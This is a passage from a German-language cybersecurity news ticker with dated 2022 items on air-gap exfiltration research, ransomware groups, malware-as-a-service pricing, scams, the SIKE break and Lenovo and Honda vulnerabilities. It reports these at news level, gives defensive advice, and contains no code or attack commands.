Die neue Methode nutzt die in Smartphones verbauten Gyroskope, um den Air-Gap zu überwinden. Diese können nämlich für den Menschen nicht hörbare Resonanzfrequenzen im Ultraschallbereich empfangen. Das Smartphone wandelt diese Töne anschliessend in Binärcode um. Damit es funktioniert, muss das Smartphone jedoch sehr nahe beim sendenden Rechner sein.

Was erschwerend hinzu kommt, ist, dass zunächst das abgeschottete System und das Smartphone einer Person, die nahe an diesem System arbeitet, kompromittiert werden müssen. Ein Smartphone ist schnell gehackt. Aber auch physisch getrennte Systeme könnten infiziert werden, erinnert Guri in seiner Beschreibung der Methode und verweist etwa auf Stuxnet. Aber auch Supply-Chain-Attacken könnten eine Malware einschleusen.

Morsen mit LEDs

Die zweite neue Methode nannte Guri EtherLED. Wie der Name vermuten lässt, nutzt die Methode die LEDs eines abgetrennten Rechners aus. In seinem Proof-of-Concept demonstrierte Guri, wie ein Schadprogramm die Treiber der Netzwerkkarte überschreiben kann und so die Kontrolle über die verbauten LEDs übernimmt. Indem die Malware das Blinken der LEDs steuert, kann der Schädling Informationen an ein externes Gerät mit einer Kamera übermitteln - entweder als Morse- oder auch direkt als Binärcode. Die Kamera muss direkten Sichtkontakt mit den LEDs der Netzwerkkarte haben.

Das ein vom Netz getrennter Rechner eine funktionierende Netzwerkkarte hat, ist durchaus möglich. Schliesslich kann ein Air-Gap auch genutzt werden, um ein komplettes Netzwerk an Rechnern von der Aussenwelt abzukapseln. Es ist davon auszugehen, dass die Methode auch mit den Status-LEDs anderer Komponenten funktionieren könnte.

Wer seine physisch getrennten Systeme also wirklich sicher machen will, sollte auch beginnen, kreativ zu werden. Es empfiehlt sich wohl, alle Lautsprecher und Mikrophone zu entfernen. Zudem sollten auch sämtliche LEDs mit einem blickdichten dunklen Tape abgedeckt werden. Oder die Rechner müssen so positioniert werden, dass die LEDs nicht sichtbar sind. Ach ja, und Lüftungsschächte sollten definitiv nicht "Tom-Cruise-gross" sein.

Übrigens: Mordechai Guri und das Cybersecurity Research Lab der Ben-Gurion-Universität des Negev beschäftigen sich schon seit einiger Zeit damit, wie man den Air-Gap überbrücken kann. Auf ihrer Website gibt die Uni eine Übersicht über alle bisher entdeckten Methoden.

23.08.2022 - 17:54 Uhr

Wenn Hacker Hacker hacken: DDoS-Attacke auf Lockbit

Die Ransomware-Gruppe Lockbit - eine der aktivsten Gruppen in dem Bereich - ist wohl selbst Opfer einer Cyberattacke geworden. Die Gruppe betreibt einen Blog, auf dem sie gestohlene Unternehmensdaten veröffentlicht. Mit dieser Masche will sie mehr Druck ausüben, wenn sie ihre Opfer erpresst. Eine DDoS-Attacke sorgte nun allerdings dafür, dass der Blog nicht mehr erreichbar ist, wie "The Register" berichtet.

Das Nachrichtenportal beruft sich auf einen Tweet von Azim Shukuhi, ein Cybersecurity-Experte von Cisco Talos – dem Cybersecurity-Arm des Netzwerkausrüsters. Gemäss Shukuhi wird der Blog derzeit mit rund 400 Anfragen pro Sekunde von über 1000 Servern überflutet. Die cyberkriminelle Gruppierung wolle nun aufstocken und so den „DDoS-Angreifern das Geld aus der Tasche ziehen“. 

 

 

Die DDoS-Attacke könnte im Zusammenhang mit früheren Aktivitäten der Ransomware-Gruppe stehen. Die Gruppe selbst vermutet, dass sie angegriffen wurden, weil sie zuvor Entrust attackiert hatte. Das US-amerikanische Unternehmen bietet Identitätsmanagement und Authentifizierungslösungen im Finanzbereich an. Die bei der DDoS-Attacke eingehenden Anfragen würden sich alle auf das Unternehmen beziehen. Und die Attacke erfolgte weniger als einen Tag nachdem Lockbit sich offiziell zum Angriff auf Entrust bekannte und damit drohte, gestohlene Daten zu veröffentlichen. 

Entrust bedient einige namhafte Kunden. Darunter Microsoft, VMware sowie das Department of Homeland Security, das Finanzministerium und das Energieministerium der Vereinigten Staaten.

Gemäss einem späteren Tweet von Shukuhi werde auch die cyberkriminelle Gruppierung hinter dem ALPHV-Schadprogramm derzeit von einer DDoS-Attacke beeinträchtigt. Diese bestätigte die Attacke allerdings noch nicht. 

 

 

Übrigens: Google wehrte in derselben Woche eine Rekord-DDoS-Attacke ab. Diese erreichte bis zu 46 Millionen Angriffe pro Sekunde, wie Sie hier nachlesen können.

15.08.2022 - 18:18 Uhr

Preise für gehackte Firmenzugänge purzeln

Der Markt für Zugänge zu kompromittierten Firmennetzwerken ist im zweiten Quartal 2022 eingebrochen. Obwohl die Anzahl Angebote gleich blieb, zahlten Cyberkriminelle insgesamt weniger: rund 660'000 US-Dollar. Im ersten Quartal 2022 lagen die Gesamtausgaben noch bei 1,1 Millionen Dollar, wie eine Auswertung der Cybersecurity-Firma Kela (PDF) zeigt.

Im Durchschnitt verlangten die Anbieter - sogenannte Initial Access Broker - im zweiten Quartal 1500 Dollar für einen illegitim erworbenen Firmenzugang. Gerade mal halb so viel wie noch im Vorquartal. Auch der Median fiel von 400 auf 300 Dollar. 

Das Geschäft von Initial Access Broker ist eng verzahnt mit demjenigen von Ransomware-Akteuren. Diese kaufen oft Zugänge zu Firmen, um deren Daten zu verschlüsseln und sie anschliessend zu erpressen. 

Ransomware-Gangs meiden fettere Beute

Der Dämpfer in diesem Schwarzmarkt zeige den Wandel, den das Ransomware-Geschäft derzeit durchmache. Einige notorische Erpresserbanden stellten den Betrieb ein, darunter etwa Darkside und Conti. Diejenigen, die noch immer Firmen erpressen, reduzierten ihre Aktivitäten, wie "Bleepingcomputer" berichtet. 

Ransomware-Banden würden nun dazu tendieren, mittelgrosse Unternehmen zu attackieren. So wollen sie eine optimale Balance zwischen Risiko und finanzieller Entlöhnung erreichen. Viele Angebote mit Zugängen zu grösseren, potenziell riskanteren Unternehmen wurden im zweiten Quartal übergangen.

Die verkauften Zugänge sind oft auf Schwachstellen zurückzuführen, die noch nicht gepatcht wurden. Firmen sollten daher darauf achten, dass sie sicherheitsrelevante Updates stets möglichst zeitnah auf den Systemen einspielen. Initial Access Broker scannen nach öffentlich bekannten Sicherheitslücken und platzieren in der Regel Backdoors in den gefundenen Netzwerken. 

08.08.2022 - 15:35 Uhr

CPU von gestern knackt Post-Quanten-Kryptografie von morgen

Die Quantencomputer der Zukunft werden wohl die heute gängigen Verschlüsselungsverfahren knacken können. Daher ist die Branche schon jetzt darauf bedacht, Systeme zu entwickeln, die auch im Quantenzeitalter Informationen noch sicher verschlüsseln können. Dies wird als Post-Quanten-Kryptografie bezeichnet. 

Das National Institute of Standards and Technology (NIST) der USA arbeitet bereits daran, ein Standardverfahren zu definieren. Nun musste es aber einen Dämpfer einstecken, wie "The Register" berichtet. 

Einer der vier Verschlüsselungsalgorithmen, die das NIST als Kandidaten für Normverfahren in der Post-Quanten-Kryptografie ansieht, wurde bereits vor dem Aufkommen der Quantencomputer geknackt. Das Verschlüsselungsverfahren lässt sich nämlich mit einer konventionellen CPU aushebeln – einer fast 10 Jahre alten konventionellen CPU – die nicht einmal bei voller Leistung läuft. 

Ein Prozessor aus dem Jahr 2013 genügt

Es geht um den „Supersingular Isogeny Key Encapsulation (SIKE)“-Algorithmus. In einem wissenschaftlichen Artikel beschreiben die Forscher Wouter Castryck und Thomas Decru von der "Katholieke Universiteit Leuven" in Belgien, wie sie die Verschlüsselung knackten. Dafür nutzten sie einen einzelnen Kern eines Intel Xeon CPU E5-2630v2 mit 2.60GHz. Um die verschiedenen Elemente des Verfahrens zu knacken, brauchte die Ende 2013 lancierte CPU zwischen 4 und 62 Minuten. 

Der Verschlüsselungsalgorithmus verwendet laut Microsoft arithmetische Operationen auf elliptischen Kurven, die über endlichen Feldern definiert sind und berechnet Isogenien zwischen den Kurven. Bislang ging man davon aus, dass es ausreichend schwierig sei, derartige Isogenien zu berechnen und dass die Sicherheit so gewährleistet sei. Microsoft wirkte zusammen mit verschiedenen Universitäten, Amazon, Infosec Global und Texas Instruments an der Entwicklung der Verschlüsselung mit. 

SIKE-Miterfinder David Jao denkt, dass sich das Verfahren noch retten lässt. Die dem NIST vorliegende SIKE-Version verwendet einen einzelnen Schritt bei der Generierung des Schlüssels. Es sei denkbar, ein robusteres Verfahren mit zwei Schritten zu entwickeln. 

Das Vertrauen in Isogenien als Basis der Post-Quanten-Kryptografie bröckelt jedoch. "Das plötzliche Auftauchen eines derart mächtigen Angriffs zeigt, dass das Feld noch nicht ausgereift ist", zitiert "The Register" Stephen Galbraith, Mathematiker an der "University of Auckland". 

Wenn Sie mehr zum Thema Verschlüsselungen lesen möchten, finden Sie hier im Hintergrundbericht einen Überblick über das Thema - von antiken bis zu modernen Verfahren: "Verschlüsselung: Die Kunst, so zu schreiben, dass fast niemand es versteht".

27.06.2022 - 14:48 Uhr

Revolut-Scam: Da hilft auch 3-D-Secure nicht bei Onlinezahlungen

Ein rares Produkt? Zu einem guten Preis? Auf einem unbekannten Webshop? Spätestens an dieser Stelle sollten die mentalen Alarmsirenen losheulen. Denn mit einiger Wahrscheinlichkeit handelt es sich um einen Betrugsversuch. 

Dies zeigt auch ein aktueller Fall, vor dem die Kantonspolizei Zürich via Cybercrimepolice.ch warnt. Auf den Webshop, um den es hier geht, wird man aufmerksam, weil dieser schwer verfügbare Produkte wie etwa eine Playstation 5 anbietet. 

Der Webshop verlangt eine Zahlung auf eine Revolut-Kreditkarte. Der Käufer oder die Käuferin sieht jedoch nicht, ob es sich um eine geschäftliche oder eine private Revolut-Beziehung handelt, wie es auf Cybercrimepolice.ch heisst. Wenn das Opfer also die Transaktion per 3-D-Secure bestätigen soll, wirken keine der Angaben in der Push-Nachricht verdächtig. Der Kaufpreis stimmt und als Händler wird Revolut angegeben. 

Kreditkartenfirma kontaktieren, Geld zurückfordern

Bestätigt man die Zahlung, ist das Geld weg und die Ware wird nie geliefert. Denn die Betrüger nutzen Revolut nicht als Zahlungsdienstleister. Stattdessen haben sie eine neue Revolut-Kreditkarte auf den eignen Namen erstellt. Das Geld des Opfers wird als Startkapital überwiesen. 

Dieser Betrug ist schwierig zu erkennen, wie die Kantonspolizei schreibt. Der Aufruf zur Bestätigung via 3-D-Secure nütze in diesem Falle nichts. Daher müsse man schon bei der Auswahl des Webshops aufpassen: Ist ein gesuchtes Produkt nur auf einer unbekannten Website im Angebot, handelt es sich dabei wohl um einen Betrugsversuch. Die Kantonspolizei empfiehlt, nur auf bekannten Webshops einzukaufen. 

Wer bereits Opfer dieses Revolut-Scams geworden ist, soll die eigene Kreditkartenfirma auffordern, sich bei Revolut zu melden und das Geld zurückzufordern. Die Londoner Neobank kenne den Betrüger. Ausserdem solle man Strafanzeige bei der lokalen Polizeistation erstatten. 

20.06.2022 - 16:09 Uhr

Wie Browser-Erweiterungen anonymes Surfen verhindern

Damit niemand weiss, was für herzige Katzenfotos man im Internet anguckt, setzen einige Internet-Besucherinnen und -Besucher etwa auf einen Tor-Browser. Dieser verschleiert die IP-Adresse und soll so anonymes Surfen ermöglichen. 

Die IP-Adresse ist jedoch nur eine Möglichkeit, eine Person im Netz zu identifizieren. Alternativ lässt sich eine Person beispielsweise auch über installierte Windows-Programme, die Bildschirmauflösung, die GPU-Auslastung und sogar über die installierten Fonts tracken. Da Menschen in der Regel Gewohnheitstiere sind, können auch die als erstes geöffneten Websites Aufschluss über die Identität einer Person geben.

Ein Webentwickler - der sich selbst "z0ccc" nennt - zeigt nun eine weitere Methode, um Personen im Internet zu verfolgen, wie "Bleepingcomputer" berichtet. Dafür nutzt er die installierten Google-Extensions im Chrome-Browser. Wenn man so eine Erweiterung anlegt, kann man gewisse Assets als "web accessible resources" definieren - auf diese haben Websites oder andere Extensions anschliessend Zugriff. Oftmals handelt es sich dabei um Bilddateien. 

Über diese einsehbaren Informationen kann man quasi einen Fingerabdruck erstellen, basierend auf den installierten und nicht installierten Erweiterungen. Der Webentwickler kreierte eine Website, mit der Neugierige prüfen können, wie einzigartig ihre Kombination an Extensions ist - und folglich wie einfach sie im Netz zu identifizieren sind. Die Website analysiert 1170 Erweiterungen. Darunter uBlock, Lastpass, Adobe Acrobat, Honey, Grammarly, Rakuten und Colorzilla. Ergänzt man den Fingerabdruck mit zusätzlichen Eigenschaften - wie etwa die Bildschirmauflösung - könne man jeden Internetsurfer eindeutig identifizieren. 

Auch geschützte Extensions sind einsehbar

Einige Erweiterungen verwenden zwar einen geheimen Token für die Kommunikation mit Websites. Der Webentwickler entdeckte jedoch einen Weg, wie er trotzdem herausfinden kann, ob diese spezifischen Erweiterungen installiert sind oder nicht: die Zeit, die man braucht, um Informationen abzurufen. 

Ruft man Ressourcen geschützter Erweiterungen ab, gehe dies länger, als es bei nicht installierten Extensions der Fall ist. Dies erklärt der Webentwickler auf Github. Auf der Entwicklerplattform zeigt "z0ccc", wie das Abfragen der Extension-Informationen genau geht. 

Die Methode funktioniert nur mit Chrome-basierten Webbrowsern. Technisch ist es auch mit Microsoft Edge möglich. Nicht aber mit Firefox – der Browser verwendet für jede Browser-Instanz einzigartige IDs für Erweiterungen. 

Übrigens: "Bleepingcomputer" machte noch eine kleine Erhebung mittels der Website von "z0ccc". Demnach verwenden über 58 Prozent der geprüften Personen keine Extensions. Sobald man jedoch drei oder vier Erweiterungen nutzt, sinkt die Anzahl Personen mit demselben Fingerabdruck auf bis zu 0,006 Prozent. Und die populärste Erweiterung - unter den bereits über die Website geprüften Personen - ist uBlock.

30.05.2022 - 14:03 Uhr

Bitterböse Betrüger betrügen bereits Betrogene 

"Sie sind das Schlimmste vom Schlimmen" - mit diesen Worten beginnt eine aktuelle Warnung der Kantonspolizei Zürich auf Cybercrimepolice.ch. Gemeint sind Betrüger, die es auf Personen abgesehen haben, die bereits einer Betrugsmasche zum Opfer gefallen sind. 

Betrüger führen und verkaufen gemäss der Meldung Listen mit Informationen über Personen, die bereits durch einen Betrug Geld verloren haben. Diese Listen enthalten einerseits Kontaktdaten, wie Name, Telefonnummer und E-Mailadressen, und andererseits auch Angaben zur Art des erfolgreichen Betrugs und zur Summe, die bezahlt wurde. 

Diese Listen werden von den Betrügern verkauft und getauscht. Denn sie gehen davon aus, dass Personen, die schon einmal betrogen wurden, lohnende Ziele für weitere Scams sind. Als ob die Masche selbst noch nicht fies genug wäre, bezeichnen die Betrüger diese Auflistungen als "Trottellisten".

Geld gegen Vorschuss

Es folgt ein sogenannter Erstattungs- oder Wiederbeschaffungsbetrug. Die Scammer kontaktieren die bereits Betrogenen per E-Mail oder Telefon und behaupten, sie könnten helfen, das verlorene Geld zurückzuerhalten. Um das Vertrauen der Opfer zu gewinnen, geben die Betrüger vor, für eine Regierungsbehörde, eine Verbraucherschutzorganisation, eine Anwaltskanzlei, eine Finanzmarktaufsicht oder eine andere Organisation zu arbeiten. Die detaillierten Informationen zum vorherigen Scam sollen die Betrüger glaubwürdig wirken lassen. 

Die Masche: Wer sein Geld zurück will, muss zuerst einen Vorschuss zahlen oder finanzielle Informationen preisgeben. Dieser Vorschuss wird teilweise als Bearbeitungs- beziehungsweise Verwaltungsgebühr, als Steuer oder sogar als Spende an eine Wohltätigkeitsorganisation bezeichnet. 

Wer den Vorschuss zahlt, sieht dieses Geld - und auch das zuvor ergaunerte Geld - nicht wieder. Staatliche Behörden und seriöse Organisationen verlangen kein Geld für eine Erstattung; sie würden daher niemals nach Kontonummern oder anderen persönlichen Informationen fragen, warnt die Kantonspolizei. Insbesondere wenn man aus heiterem Himmel kontaktiert wird, sei es keine gute Idee, im Voraus zu zahlen. Wer aufgrund so einer Masche bereits Geld verloren habe, solle bei einer lokalen Polizeistation Anzeige erstatten. 

23.05.2022 - 16:01 Uhr

Chinesische Weltraumpiraten attackieren russische Raumfahrtunternehmen

Eine neue chinesische Hackergruppe macht derzeit vor allem Unternehmen in Russland das Leben schwer: Space Pirates. Entdeckt und benannt wurde die Gruppierung von der russischen Security-Firma Positive Technologies, wie "Bleepingcomputer" berichtet.

Der Name sei darauf zurückzuführen, dass die Hacker sich darauf spezialisiert hätten, Unternehmen aus der Luft- und Raumfahrtbranche auszuspionieren. Zum aktuellen Beuteschema gehören ferner Firmen und Regierungsbehörden in Russland, Georgien und der Mongolei, die in den Bereichen IT-Dienstleistungen, Luft- und Raumfahrt und Stromwirtschaft aktiv sind. In einzelnen Fällen hätten die "Weltraumpiraten" auch chinesische Firmen attackiert, um sich zu bereichern. 

Attribution, also die Zuordnung einer cyberkriminellen Organisation zu einem bestimmten Land, ist oft schwierig, selten definitiv und gelegentlich bewusst irreführend. In diesem Fall entdeckten die Sicherheitsforscher gewisse Verbindungen mit anderen mutmasslich chinesischen Hackergruppen, darunter APT41 (Winnti), Mustang Panda und APT27. Zu solchen Überschneidungen komme es, weil es in der Region unter Hackern üblich sei, sich über ihre Tools auszutauschen. Chinesische Hacker sind in letzter Zeit vermehrt aggressiv gegen russische Ziele vorgegangen. 

Rund ein Jahr in zwei russischen Firmen drin

Unter den bekannten Opfern befinden sich auch zwei russische Unternehmen mit staatlicher Beteiligung. In beiden Fällen hatten die Space Pirates während rund einem Jahr Zugriff auf Server und Netzwerk der Firmen. In der Zeit stahlen sie zahlreiche vertrauliche Dokumente. Die Hackergruppe fiel im Sommer 2021 erstmals auf. Den Betrieb nahm sie aber wohl schon 2017 auf.

Die Hacker setzen auf eine Vielzahl an Tools – sowohl bekannte Backdoors als auch eigene Kreationen. Die Security-Forschenden von Positive Technologies entdeckten drei zuvor unbekannte modulare Schadprogramme: Deed RAT, BH_A006, and MyKLoadClient.

Die Tools verschaffen Zugriff auf fremde Rechner, sammeln Systeminformationen, bauen eine Kommunikation zu den Angreifern auf, manipulieren Systemeinstellungen, injizieren Code in Prozesse und setzen dabei verschiedene Methoden ein, um unter dem Radar zu bleiben.

16.05.2022 - 12:02 Uhr

Von Ransomware bis Miner: So wenig kostet Malware heutzutage noch

Die US-amerikanische IT-Security-Firma Cyble hat einen Anbieter von Schadprogrammen unter die Lupe genommen. Die analysierte Tor-Website "Eternity Project" bietet eine Reihe von Malware-Tools für Windows an - zu sehr tiefen Abo-Preisen, wie "The Register" berichtet. 

  • Für das kleine Budget gibt es den "Eternity Miner". Das Schadprogramm kostet 90 US-Dollar im Jahresabo. Es zapft die Rechenleistung eines infizierten Geräts an und schürft damit nach Kryptowährungen. Der IT-Parasit versteckt sich vor dem Task-Manager und kann sich selbst automatisch neu starten, wenn das Schadprogramm beendet wurde.
  • Für ein paar Dollar mehr – insgesamt 110, um genau zu sein – gibt es den "Eternity Clipper". Das Schadprogramm überwacht die Zwischenablage eines infizierten Systems. Dabei achtet es darauf, ob Krypto-Wallets erwähnt werden und ersetzt diese mit der Wallet-Adresse der Kriminellen.
  • Für 260 Dollar pro Jahr kann man das Schadprogramm "Eternity Stealer" kaufen. Der Schädling im Jahresabo stiehlt Passwörter, Cookies, Kreditkartendaten und Krypto-Wallets auf infizierten Rechnern. Über einen Telegram-Bot schickt die Malware die Informationen zurück an den Angreifer. Das Schadprogramm kann zahlreiche Browser, VPN-Anbieter, Messaging- und E-Mail-Dienste sowie Gaming-Plattformen kompromittieren.
  • Der "Eternity Worm" kostet 390 Dollar. Dieser verbreitet sich via USB- und Cloud-Drives, infizierten Dateien und Netzwerk-Speichern. Findet der Wurm Kontakte auf einem infizierten Gerät, sendet er automatisch Telegram- und Discord-Nachrichten. So versucht der Schädling, weitere Opfer zu finden. 
  • Die teuerste Malware ist die "Eternity Ransomware": 490 Dollar. Die Erpressersoftware kann sämtliche Dateien auf einem Gerät verschlüsseln – dazu nutzt sie AES und RSA (Lesen Sie hier mehr zum Thema Verschlüsselung). Optional lässt sich auch eine Deadline hinzufügen. Ist die Frist verstrichen, können die Opfer ihre Daten nicht mehr entschlüsseln. 

DDoS-Tool kommt noch

Nicht auf der Preisliste steht der "Eternity DDoS Bot". Dieser werde aktuell noch entwickelt, schreibt Cyble. "Wir vermuten, dass die Entwickler hinter dem Eternity-Projekt Code aus einer bestehenden Github-Repository verwenden, diesen dann verändern und unter einem neuen Namen verkaufen", heisst es in dem Bericht. 

Das "Eternity Project" hat auch einen Telegram-Kanal mit etwa 500 Abonnenten. Diesen nutzen die cyberkriminellen Entwickler, um Features und Funktionen in Videos zu präsentieren. 

Interessanterweise bietet der Kanal auch die Möglichkeit, die Binärdaten der gekauften Malware individuell anzupassen. Dies sei einfach "der neueste Weg zum Markt für Standard- und Low-End-Malware", heisst es in dem Bericht von Cyble. Der Sicherheitsanbieter geht davon aus, dass diese Schadprogramme wohl eher für Attacken auf Privatpersonen und KMUs gedacht sind und weniger für Angriffe auf Grossunternehmen. 

10.05.2022 - 14:37 Uhr

Cyberkriminelle ködern NFT-Künstler mit Cyberpunk-Affen in Anzügen

Non Fungible Tokens (NFTs) spalten zurzeit die Gemüter. Die einen halten sie für die Digitalisierung der Kunstszene. Die anderen verweisen auf die Umweltbelastung, die durch NFTs entsteht. Schliesslich werden jedes Mal rund 83 Kilogramm CO2 freigesetzt, wenn ein NFT-Werk auf der Blockchain "geminted" wird, wie die "FAZ" unter Berufung auf den "NFTClub" berichtet. Einen einzelnen Baum zu pflanzen, reicht also schon nicht mehr aus, um dies zu kompensieren.
Von gewissen NFTs sollte aber jeder die Finger lassen. Denn wo ein Hype besteht, lauern auch immer Cyberkriminelle. Wie der kalifornische Cybersecurity-Anbieter "Malwarebytes" schreibt, haben es Betrüger derzeit auf NFT-Künstlerinnen und -Künstler abgesehen.

Die angeschriebenen Personen sollen "fantastische und liebenswerte Charaktere" im Stil der Gruppe erstellen. Das Jobangebot kommt mit einem Lohnversprechen von 200 bis 350 US-Dollar pro Tag sowie einem Link. Dieser führt zu einem RAR-Archiv, das eine Reihe von GIFs enthält. Die Bilder sollen als Beispiele dienen, damit die Künstler und Künstlerinnen den Stil der Gruppe kennenlernen können.

Bilder von Cyberpunk-Affen in verschiedenen Kostümen
Ein Blick auf die Dateiendung entlarvt den Schädling zwischen den Beispielbildern. (Source: Malwarebytes)

Versteckt zwischen den Beispielbildern lauert jedoch eine ausführbare Datei, die sich als GIF tarnt. Klickt man auf die Datei, installiert sie einen Info Stealer – einen Trojaner, der Daten entwendet. Ausser Passwörtern und Kreditkartendaten hat es der Schädling auch auf Crypto-Wallets abgesehen. Letzteres ist für NFT-Künstlerinnen und -Künstler besonders problematisch. Im dümmsten Fall stiehlt die Malware nämlich auch sämtliche in der Wallet gespeicherten NFTs.

Was den Schädling noch fieser macht: Das Schadprogram kann sich wahrscheinlich einfach an installierten Antivirenprogrammen vorbeischleusen. Laut "Virustotal" erkennt noch nicht mal die Hälfte der getesteten Engines (30 von 69) die ausführbare Datei als Schädling. Immerhin hat sich diese Zahl in weniger als einer Woche bereits verdoppelt. Wie "Bleepingcomputer" berichtet, schlugen zu Beginn lediglich 15 Engines Alarm.

25.04.2022 - 12:34 Uhr

BlackCat-Ransomware: FBI warnt vor fieser Miezekatze, die Rust mag

Bei dieser schwarzen Katze ist es egal, ob sie von links oder rechts kommt; sie bringt definitiv Unglück. Die cyberkriminelle Gruppierung BlackCat (auch bekannt als ALPHV) ist noch relativ neu. Die Ransomware-as-a-Service-Bande tauchte im November 2021 erstmals auf. Unerfahren ist sie deswegen aber nicht. Sicherheitsexperten und Strafverfolgungsbehörden haben die Entwickler und Geldwäscher der Gruppe mit den berüchtigten Darkside/Blackmatter-Bandenin Verbindung gebracht. 

In einer aktuellen Warnung schreibt das FBI, dass BlackCat bereits 60 Organisationen weltweit kompromittiert hat. Was BlackCat speziell macht: Laut dem FBI ist es die erste Ransomware-Gruppe, der dies mit Hilfe der Programmiersprache Rust gelungen ist. 

Die Gruppierung schreibt ihre Windows attackierende Ransomware in Rust. Aufgrund von gewissen Sicherheitsmassnahmen in der Programmiersprache sei das Schadprogramm daher möglicherweise stabiler und zuverlässiger, heisst es in einem Bericht von "The Register". 

Die BlackCat-Ransomware greift Windows-Geräte an. Laut dem FBI nutzt die Gruppierung in der Regel zuvor entwendete Zugangsdaten aus. Sind sie im Netzwerk drin, setzen die Hacker auf PowerShell-Skripte in Kombination mit der Spionagesoftware Cobalt Strike, um Sicherheitsfeatures zu deaktivieren und die Malware zu implementieren. 

Zuerst stehlen, dann verschlüsseln

BlackCat kompromittiert anschliessend das Active Directory und die Admin-Konten. Mit dem Taskplaner werden daraufhin bösartige Group Policy Objects konfiguriert, um die Ransomware auszurollen. Bevor das Schadprogramm alle Daten verschlüsselt, werden diese gestohlen. Das soll den Druck auf die Opfer erhöhen, das nach der Infektion geforderte Lösegeld zu zahlen. 

Die Cyberkriminellen fordern in der Regel Bitcoin- oder Monero-Beträge in der Höhe von mehreren Millionen US-Dollar. Laut dem FBI haben sie aber auch schon tiefere Zahlungen akzeptiert. 

Das FBI rät in dem Schreiben ausdrücklich davon ab, Lösegelder zu zahlen. Dies sei keine Garantie dafür, dass man die Daten zurückerhalte. Ausserdem könne dies Cyberkriminelle ermutigen, weitere Organisationen anzugreifen. 

Alle technischen Details zu BlackCat sowie die Indicators of Compromise (IOC) - also die Anzeichen einer Infektion - sind in der Warnung des FBI (PDF) zu finden.


 

19.04.2022 - 15:51 Uhr

Schwachstellen in Lenovo-Laptops erlauben direkten Zugriff aufs Mainboard

Der slowakische IT-Security-Anbieter Eset warnt gemeinsam mit dem Hersteller Lenovo vor dessen Consumer-Laptops. Insgesamt sind über 100 verschiedene Modelle betroffen: von kostengünstigen Geräten wie dem Ideapad-3 über Gaming-Boliden wie dem Legion 7 bis zu den neuen Yoga-Slim-Produkten.

Sicherheitsforschende von Eset entdeckten gleich drei Schwachstellen, die Angreifern "Tür und Tor auf den Laptops öffnen", wie der Sicherheitsanbieter schreibt. Die ersten beiden Schwachstellen betreffen die UEFI-Treiber. Die Abkürzung steht für Unified Extensible Firmware Interface. Das Modul ist Teil der Firmware des Mainboards und ermöglicht unter anderem Sicherheitsfunktionen wie Secure Boot - also das Starten des Rechners in einem abgesicherten Modus. 

Das heisst, Angreifer könnten auf der Ebene des Mainboards Malware auf den Laptops einschleusen. "UEFI-Malware kann lange unbemerkt bleiben und stellt ein immenses Bedrohungspotential dar", sagt Eset-Forscher Martin Smolár, der die Schwachstellen entdeckte. "Die Schadprogramme werden früh im Boot-Prozess ausgeführt, bevor das Betriebssystem startet." Somit würden sie fast alle Sicherheitsmassnahmen gegen Schadprogramme auf den höheren Ebenen umgehen. 

Bei den ersten beiden Schwachstellen (CVE-2021-3970, CVE-2021-3971) handelt es sich eigentlich um "sichere", in die UEFI-Firmware eingebaute Hintertüren. Diese sollten nur während des Herstellungsprozesses der Laptops verwendet werden können. Allerdings wurden sie in den ausgelieferten Modellen nicht ordnungsgemäss deaktiviert. Cyberkriminelle könnten diese Hintertüren nun verwenden, um den SPI-Flash-Schutz (BIOS-Kontrollregister-Bits und Protection-Range-Register) oder die UEFI-Secure-Boot-Funktion von einem privilegierten Benutzermodus-Prozess während des laufenden Betriebssystems zu deaktivieren.

Updaten oder verschlüsseln

Ein näherer Blick auf die Binärdateien dieser Hintertüren brachte gemäss Eset die dritte Sicherheitslücke zum Vorschein (CVE-2021-3972). Diese ermögliche willkürliche Lese- und Schreibzugriffe auf das System Management RAM. So könnten Angreifer bösartigen Code mit höheren Privilegien ausführen. 

Eset empfiehlt Lenovo-Kunden, sich die Liste mit den betroffenen Geräten anzusehen und ihre Firmware entsprechen den Anweisungen des Herstellers zu aktualisieren. Die Liste wurde von Lenovo hier veröffentlicht.

Es gibt auch Geräte, die von der Schwachstelle UEFI SecureBootBackdoor (CVE-2021-3970) betroffen sind, aber keine Updates mehr erhalten vom Hersteller. Wer so ein Gerät besitzt, soll auf eine Trusted-Platform-Module-Lösung ausweichen. Diese verschlüsselt die Festplatten und macht die Daten für Cyberkriminelle unzugänglich. 

Wer mehr zum Thema UEFI-Malware lesen und wissen will, was diese so besonders und gefährlich macht, kann hier ein Interview mit Eset-Experte Thomas Uhlemann zur UEFI-Malware Lojax lesen. "Wenn man infiziert ist, ist es eigentlich schon zu spät."

 

11.04.2022 - 10:21 Uhr

Hacker zeigen Herz für Raser - vermutlich unabsichtlich

Es ist schon etwas länger her: Im Oktober 2021 haben Hacker Server der Schweriner IT- und Servicegesellschaft (SIS) und des Kommunalservice Mecklenburg (KSM) mit einer Ransomware infiziert. Die Behörden in Schwerin und im Landkreis Ludwigslust-Parchim (in Mecklenburg-Vorpommern) mussten daraufhin ihre Systeme herunterfahren und konnten sie erst nach und nach wieder hochfahren, wie "Heise" berichtet. 

Inzwischen würden die Systeme wieder weitgehend normal laufen, heisst es in einem Bericht von "ICT-Channel". Aber aufgrund des Hackerangriffs konnten die Behörden von Mitte Oktober bis zum Ende des Jahres 2021 weder auf die Fahrzeughalterdatenbank zugreifen noch das Kraftfahrtbundesamt kontaktieren. 

Temposünder, die in dem Zeitraum geblitzt wurden, müssen daher keine Bussen zahlen. Die Verfahren seien nun verfallen, weil der Landkreis die Daten nicht verarbeiten konnte und schliesslich die Fristen überschritten wurden, zitiert Heise einen Kreissprecher. Gemäss dem Bericht betrifft dies etwa 3000 Fälle. 

Wer für die Ransomware-Attacke verantwortlich sei, bleibe unklar. Folglich kann also nur darüber gemutmasst werden, ob ein Zusammenhang zwischen dem Cyberangriff und den Temposündern besteht.
 

28.03.2022 - 17:21 Uhr

Hacker brauchen keine Schlüssel, um Honda-Autos zu starten

Ein Auto ist auch nur IT - und somit auch anfällig für Hacker. Dies zeigt aktuell etwa Honda. Verschiedene Sicherheitsforschende warnen gerade vor einer Schwachstelle (CVE-2022-27254), mit der sich gewisse Modelle des japanischen Autoherstellers aufschliessen lassen, wie "Bleepingcomputer" berichtet. 

Die Schwachstelle betrifft das Remote-Keyless-System. Wer ein Honda-Fahrzeug besitzt, kann mit dem dazu gehörigen Funkschlüsselanhänger sein Auto ver- oder aufschliessen. Das Hochfrequenzsignal, dass der Anhänger an das Auto schickt, könnte ein Hacker jedoch abfangen, wie die Sicherheitsforschenden zeigten. 

